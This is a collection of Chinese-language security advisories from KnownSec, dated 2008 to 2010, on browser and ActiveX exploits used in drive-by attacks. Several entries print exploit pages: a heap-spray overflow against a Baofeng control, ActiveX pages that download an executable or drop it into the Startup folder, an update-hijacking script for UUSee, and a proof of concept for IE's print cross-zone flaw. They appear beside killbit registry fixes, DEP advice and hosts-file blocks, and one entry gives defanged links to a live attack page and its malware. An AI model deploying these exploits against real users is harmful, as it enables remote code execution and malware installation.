知道创宇

发 布 时 间 ：Mon Jul 20 14:50:00 2010
最后更新时间：Mon Jul 20 14:50:00 2010
________________________________________
知道创宇安全团队（KnownSec Team）发现在网络已公布了大量的电子政务网站、银行相继被黑的情况，根据被公布的信息，是TRS存在未知的高危级别漏洞。

TRS是国内流行的一个网站系统，官方网站：http://www.trs.com.cn/

TRS在国内政务网站，银行等都有大量的部署应用，出现了高危漏洞的严重性可想而知。

据了解，TRS的未知高危漏洞是可直接写入webshell，然后得到一个控制权限，并且可以借助程序实现自动化 大规模攻击。

目前，我们建议所有使用TRS应用的网站管理员在近期对服务器安全应给予更多的关注，加强对服务器的权限控制，以降低在遭受攻击后的影响。

假如有使用TRS的网站管理员愿意与我们交流，也可以随时联系我们。

知道安全提醒网民，近期在使用银行、浏览电子政务网站要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被黑，被挂马，可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/，也可向知道创宇进行举报：发送邮件至sec@knownsec.com，我们会以最快的速度进行响应。

Popularity: 12% [?]

发布时间：2010-1-16 11：30 (UTC+0800)

漏洞警报 程度：严重

影响范围：IE6-IE8（除IE5.01 SP4之外）

——————–

近日google与adobe均公开宣布被黑客攻击，此次攻击被外界命名为Auroro（极光）。

mcafee公司在第一时间披露了关于攻击内容的相关细节，其中提到了黑客使用了ie浏览器的未知漏洞，意图通过该漏洞渗透进入公司内部窃取源代码。

知道创宇安全团队（KnownSec Team）通过网上披露的信息构造测试样本，确认了该漏洞的存在，并且其影响范围广泛，可能会被利用于大规模挂马攻击并且造成严重危害。 

该漏洞进行攻击主要通过用户使用ie系列浏览器访问精心构造的漏洞攻击页面，攻击成功后将在用户机器以用户当前权限执行任意代码，完全控制用户主机。

  预计在本月内将会有攻击者会构造出用于大规模挂马攻击的恶意代码页面，并且投入挂马攻击中使用，请广大网民关注微软的补丁更新，及时安装补丁程序，抵御针对该漏洞发起的大规模恶意攻击，或者安装安全软件来减少攻击所带来的威胁，可使用365门神防御未知浏览器漏洞，降低来自互联网的安全威胁。

知道创宇恶意网站监控中心可以完全检测利用该漏洞攻击的恶意网站，在大规模攻击利用时将可以在第一时间进行捕获进行进一步的警报。

防御方案：

 1. 目前微软承诺尽快推出对应的补丁程序，请打开自动更新，及时安装补丁。

 2. 开启浏览器DEP攻击用于抵御浏览器漏洞攻击。

开启DEP保护方法： 系统属性——高级——性能——数据执行保护

 3. 推荐安装安全软件来减少攻击所带来的威胁，可使用365门神防御未知浏览器漏洞。

 知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/

推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 14% [?]

 知道创宇安全团队（KnownSec Team）于今天捕获利用暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞的网马及其生成器。

该漏洞是由于暴风影音2009 mps.dll（clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB）中OnBeforeVideoDownload函数未对传入参数的长度进行验证，当传入一个超长字符串时将发生栈溢出。
受影响版本：暴风影音2009【3.09.04.17】及其以下版本
部分代码如下：
bf.htm：
<html>
<body>
<object classid=”clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB” id=”target”></object>
<script src=”sfbf.css” mce_src=”sfbf.css”></Script>
<script>

    var shenfu=unescape(sfcode.replace(/b78/g,”\x25\x75″));
    var bigblock = unescape(”%u9090%u9090″);
    var headersize = 20;
    var slackspace = headersize+shenfu.length;
    while (bigblock.length<slackspace)
        bigblock+=bigblock;
     
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<sionfull)
        block = block+block+fillblock;
 
    memory = new Array();
    for (x=0; x<300; x++)
        memory[x] = block + shenfu;
    var sfnop = ”;
    while (sfnop.length < 4150)
        sfnop+=”\x0c\x0c\x0c\x0c”;
    target.OnBeforeVideoDownload(sfnop);

</script>
</body>
</html>

sfbf.css：
var sfcode = “。。。shellcode部分省略。。。”;var sionfull = 0×40000;

解决办法（来自softrce.net）:
在厂商没有推出相应的补丁之前，
建议用户通过注册表对相应的CLSID:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB设置Killbit
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB}]
“Compatibility Flags”=dword:00000400

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 11% [?]

发布时间：Thu Feb 19 2009 11:32:02 UTC+0800
最后更新时间：Thu Feb 19 2009 11:32:02 UTC+0800
________________________________________
知道创宇安全团队（KnownSec team）于近期捕获针对ms09-002漏洞编写的特制网页。如果用户使用 Internet Explorer 查看特制网页，则所有漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

对于在 Windows XP 和 Windows Vista 的所有受支持版本上运行的 Internet Explorer 7，此安全更新的等级为“严重”。 对于在 Windows Server 2003 和 Windows Server 2008 的所有受支持版本上运行的 Internet Explorer 7，此安全更新的等级为“中等”。

受影响的软件

  该漏洞利用了IE对释放的对象重利用的异常，经过精心编写shellcode进行利用，可达到在客户端远程执行代码的效果。

漏洞的利用代码片段已经在网络被公布，最早出现于国外。近期内有可能出现小规模利用该漏洞进行挂马攻击。

该漏洞攻击页面存在于hxxp://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html

下载病毒：

htxp://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.exe 

推荐的应对方法：

1.目前官方已经发布补丁，请及时安装安全更新补丁并开启自动更新：

http://www.microsoft.com/china/technet/security/bulletin/MS09-002.mspx

2. 安装365门神软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://365menshen.com

Popularity: 23% [?]

发布日期：2008-12-09    16：22（GMT）

最后更新日期：2008-12-12  12：13（GMT）:

________________________________________

鉴于此漏洞的危险性，作为美国微软在国内的安全服务提供商，我们已第一时间发布公告并且分析出漏洞细节，并提交给美国微软相关部门，这里不再公布具体细节。

知道安全团队（KnownSec team）于近期捕获利用IE7一个内存越界的漏洞进行攻击的恶意代码。此漏洞于11月在小范围内泄露，于12月9日前后才完全出售流通在黑色产业，并且有人赶制出网马生成器，相信会在短期内十分流行。

由于该漏洞在我们监控系统最初捕获时我们团队没有很详细地分析，以为是已经被修补的漏洞，并且在网络上发现了很多网马以及代码帖子，以为不是0DAY漏洞，便在内部共享粘贴流出了网络上流传的代码以及挂马页面的代码。这是我们的失误：（

历史：

IE7的XML里存在可以导致内存越界的漏洞，通过编写畸形XML代码并且使用JavaScript脚本操作SHELLCODE去执行任意代码。

在2008年下半年开始有流传IE7的漏洞，并于10月份左右开始流出私人买卖，于11月份流入黑市买卖，开始有人面谈出售。

最终出现在网络的具体时间为12月份，大量二手三手漏洞在黑产运作层流通，并且于12月份初开始有大量的人购买二手代码去开发生成器，在9号开始出现在挂马利用上。

分析：

影响版本:

系统：

WINDOWS XP

WINDOWS 2003

WINDOWS VISTA

浏览器：

IE5

IE6

IE7

IE8

描述：

由于SDHTML里处理对象存在在错误导致内存紊乱。
构造某种条件可以使得SDHTML检测到错误释放已被分配的对象，但是释放已被分配的对象后SDHTML并未返回而是继续使用被释放的对象的内存执行，如果这些内存又被分配给其他用途，将导致SDHTML把这些内存当作一个对象来操作。0DAY挂马里使用了XML的SRC字符串对象占用了这些释放对象的空间，而对象指针里包含函数例程指针，最终导致代码执行 。

由于该漏洞尚未被修补，具体细节请等待微软官方发布补丁的详细参考。

防御：

1.请关注微软官方网站及时下载补丁。

2. 开启DEP保护：

系统属性——高级——性能——数据执行保护

可以防止恶意攻击。

3.将wwwwyyyyy.cn以及sllwrnm5.cn加入HOSTS进行屏蔽。

复制一下代码进入HOSTS即可：

127.0.0.1   wwwwyyyyy.cn

127.0.0.1   sllwrnm5.cn

Popularity: 100% [?]

发布日期：2008-7-18

最后更新日期：2008-7-18   15：57（GMT)

受影响系统：

详细: 

以下代码可能包含恶意行为,请勿轻易尝试,使用者风险自负.

<HTML><HEAD>
<META http-equiv=Content-Type content=”text/html; charset=gb2312″>
<META content=”MSHTML 6.00.2900.3354″ name=GENERATOR></HEAD>
<BODY>
<OBJECT id=install classid=clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A></OBJECT>
<SCRIPT>
var YEtYcJsR1=”http://127.0.0.1/xxx.exe”;
install[”DownloadAndInstall”](YEtYcJsR1);
</SCRIPT>
</BODY></HTML>

目前厂商已经发布新浪网络电视修复版本并且进行强制升级.请用户及时更新软件.

UC的用户请继续关注http://www.51uc.com/进行更新.

也可以为clsid：78ABDC59-D8E7-44D3-9A76-9A0918C52B4A设置kill bit.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{78ABDC59-D8E7-44D3-9A76-9A0918C52B4A}]
“Compatibility Flags”=dword:00000400

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 28% [?]

发布日期：2008-7-10

最后更新日期：2008-7-10   15：57（GMT）

受影响系统：

Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
Microsoft Snapshot Viewer 10.0.4622

 详细: 

受到影响的产品主要是Microsoft Access2003以及之前的版本,或者安装了Microsoft Snapshot Viewer 的系统都可能遭受攻击.

Microsoft Access中捆绑了快照工具Microsoft Snapshot Viewer,由于该工具的控件没有正确验证SnapshotPath,
CompressedPath的参数,导致用户在访问到黑客构造的攻击网页后,可能将恶意文件下载到任意位置,并且随着系统启动而执行.

<html>
<object classid=’clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9′ id=’obj’></object>
<script language=’javascript’>
var buf1 = ‘http://http://www.scanw.com/greysign/test.exe’;
var buf2 = ‘C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe’;
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>

目前厂商尚未发布补丁程序.建议使用此软件的用户关注以下地址进行更新:

http://www.microsoft.com/technet/security/

将以下CLSID设置KILLBIT:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
“Compatibility Flags”=dword:00000400

安装365门神（WESEC）软件，对IE浏览器在打开网站的时候进行保护，拦截来自网络带有恶意代码的网页攻击。使用帮助和下载：http://www.scanw.com/

Popularity: 29% [?]

发布日期：2008-6-16

最后更新日期：2008-6-17   13：37（GMT）

关于UUSee网络电视：UUSee网络电视2008，是悠视网打造的一款全新网络电视收看软件，用户使用这款软件可以免费收看500多路新颖频道，共计1000多个精彩节目。

受影响版本：UUSee网络电视2008 4.0.0.32 （UUUpgrade.ocx 3.0.2.12）

描述：

部分代码如下：

try{var g; var storm=new ActiveXObject(”UUUPGRADE.UUUpgradeCtrl.1″);} catch(g){}; finally{if(g!=”[object Error]”){ var url=”http://***“; storm=(document.createElement(”object”)); ActivePerl=”-1C59-4BBB-8E8″; getSpraySlide=”1-6E83F82C813B”; helloworld2Address=”clsid:2CACD7BB”; storm.setAttribute(”classid”,helloworld2Address+ActivePerl+getSpraySlide) storm[”Update”](”\Program Files\Common Files\uusee\” ,url+”UU.ini”,”",1)}}

这段代码通过修改访问者的UU.ini，将UU.ini里的升级URL指向恶意文件来进行攻击，以下为UU.ini的内容：

[Global]
TotalVersion=5.4.15.81
SubPath=UUPlayer_2008
force=2
[Add]
UUSeeMediaCenter.exe=9.0.0.12
[Kill]
[Remove]
[UUSeeMediaCenter.exe]
Url=http://***/malware.cab
subpath=
reg=1
type=1

另外，网络上最早出现UUsee网马生成器的截图：

Popularity: 17% [?]

发布日期：2008-5-26

最后更新日期：2008-5-26   17：37（GMT）

最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马，该网马通过网页加载一个正常的FLASH文件，再在那个FLASH文件里调用嵌入恶意构造的FLASH文件，这时会导致溢出，从而可能执行任意指令。以下为调用页内容：

 <script>
window.onerror=function(){return true;}
function init(){window.status=”";}window.onload = init;
if(document.cookie.indexOf(”play=”)==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”play=Yes;path=/;expires=”+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf(”msie”)>0)
{
document.write(’<object classid=”clsid:d27cdb6e-ae6d-11cf-96b8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0″ width=”0″ height=”0″ align=”middle”>’);
document.write(’<param name=”allowScriptAccess” value=”sameDomain”/>’);
document.write(’<param name=”movie” value=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’<param name=”quality” value=”high”/>’);
document.write(’<param name=”bgcolor” value=”#ffffff”/>’);
document.write(’<embed src=”http://www.XXX.cn/flash/XX.swf” mce_src=”http://www.XXX.cn/flash/XX.swf”/>’);
document.write(’</object>’);
}else
{document.write(”<EMBED src=http://www.XXX.cn/flash/XX.swf width=0 height=0>”);}}
</script>  以下为正常的FLASH文件使用的脚本：

<!–
Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability

Author: Aviv Raff
http://aviv.raffon.net/

Summary

Internet Explorer is prone to a Cross-Zone Scripting vulnerability in
its “Print Table of Links” feature. This feature allows users to add to
a printed web page an appendix which contains a table of all the links
in that webpage.

An attacker can easily add a specially crafted link to a webpage (e.g.
at his own website, comments in blogs, social networks, Wikipedia,
etc.), so whenever a user will print this webpage with this feature
enabled, the attacker will be able to run arbitrary code on the user’s
machine (i.e. in order to take control over the machine).

Affected version

Internet Explorer 7.0 and 8.0b on a fully patched Windows XP.
Windows Vista with UAC enabled is partially affected (Information Leakage only).
Earlier versions of Internet Explorer may also be affected.

Technical details

Whenever a user prints a page, Internet Explorer uses a local resource
script which generates an new HTML to be printed. This HTML consists of
the following elements: Header, webpage body, Footer, and if enabled,
also the table of links in the webpage.

While the script takes only the text within the link’s inner data, it
does not validate the URL of links, and add it to the HTML as it is.
This allows to inject a script that will be executed when the new HTML
will be generated.

As I said in a previous post, most of the local resources in Internet
Explorer are now running in Internet Zone. Unfortunately, the printing
local resource script is running in Local Machine Zone, which means that
any injected script can execute arbitrary code on the user’s machine.

Proof of Concept

The following is an example of a URL which executes Windows Calculator:

http://www.google.com/?q=<script defer>new ActiveXObject(“Wscript.Shell”).run(“calc”)</script>
–>

<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

/*www.scanw.com
           知道安全      */  

Popularity: 23% [?]